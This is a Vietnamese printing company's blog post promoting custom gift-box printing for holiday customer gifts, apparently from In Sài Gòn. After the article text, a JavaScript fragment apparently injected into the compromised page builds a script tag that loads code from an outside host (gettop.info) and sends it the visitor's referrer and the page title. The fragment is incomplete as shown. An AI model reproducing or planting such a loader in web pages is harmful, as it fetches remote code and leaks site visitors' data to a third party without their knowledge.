In ấn - thiết kế

Giải bài toán quà tặng khách hàng dịp Lễ, Tết

Giải bài toán quà tặng khách hàng dịp Lễ, Tết

Giải bài toán quà tặng khách hàng dịp Lễ, Tết

Đánh giá in sản phẩm

Vào các dịp Lễ, Tết, việc tặng quà tri ân cho khách hàng là thực sự cần thiết. Đó vừa làm dịp tri ân các khách hàng đã ủng hộ công việc kinh doanh của doanh nghiệp trong thời gian qua, vừa là cơ hội để PR tên tuổi của doanh nghiệp. Bài toán đặt lên hàng đầu là làm thế nào để chuẩn bị một món quà vừa lịch sự, vừa tiết kiệm chi phí mà khách hàng hài lòng. Tất nhiên, với ngân sách và chiến lược của mỗi doanh nghiệp khác nhau thì giá trị các món quà tri ân cũng sẽ khác nhau. Nhưng việc lựa chọn hình thức gói quà thì dường như chỉ có vài lựa chọn: Giỏ quà, Túi giấy hay Hộp giấy…

Hộp giấy được nhiều doanh nghiệp lựa chọn để gói quà vừa lịch sự, vừa tiện dụng.

Gần đây, hình thức được nhiều doanh nghiệp lựa chọn là gói bằng hộp giấy. Tuy nhiên, không phải một chiếc hộp thông thường như mùa ngoài chợ, siêu thị về vì giá bán lẻ của chúng quá mắc, cộng thêm với chi phí in ấn lên bao bì hộp giấy cũng khá cao. Nhiều doanh nghiệp cần đến số lượng hàng nghìn hộp thì họ tìm đến các đơn vị chuyên sản xuất và in ấn bao bì hộp giấy để tối ưu hóa chi phí này. Một số doanh nghiệp lớn đã chọn In Sài Gòn là đối tác của mình để thực hiện các ý tưởng hộp quà tặng để gửi đến khách hàng của mình như công ty Đất Xanh, ABC Bakery… để vừa có được hộp quà như ý, vừa đảm bảo chi phí thấp với chất lượng thành phẩm cao.

Với kinh nghiệm in bao bì hộp giấy lâu năm, In Sài Gòn luôn tận tình tư vấn, hướng dẫn khách hàng cách chọn hộp giấy sao cho chi phí được tiết kiệm tối đa mà vẫn làm cho giá trị sản phẩm tăng lên. Máy móc của Việt in hiện đại giúp ghép file in hộp giấy của nhiều khách hàng vào cùng một lúc nên tiết kiệm được giấy và công. Các công đoạn được thực hiện trực tiếp tại xưởng và liên tục với đội ngũ thợ lâu năm chuyên nghiệp giúp tiết kiệm thời gian. Thành phẩm ra đời với thời gian ngắn nhưng chất lượng mực in và khung hộp chắc chắn, giúp sử dụng được lâu, hạn chế rủi ro móp méo trong lúc vận chuyển.

Cùng với món quà mà doanh nghiệp đã kỳ công lựa chọn, một chiếc hộp quà tặng đẹp sẽ khiến khách hàng cảm thấy hài lòng. Sài Gòn rất hân hạnh được đồng hành để sẻ chia những khó khăn của doanh nghiệp khi mỗi dịp Lễ, Tết bằng dịch vụ in ấn bao bì hộp giấy chuyên nghiệp, uy tín của mình.

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Posted in: Thông tin in ấn

Leave a Comment (0) ↓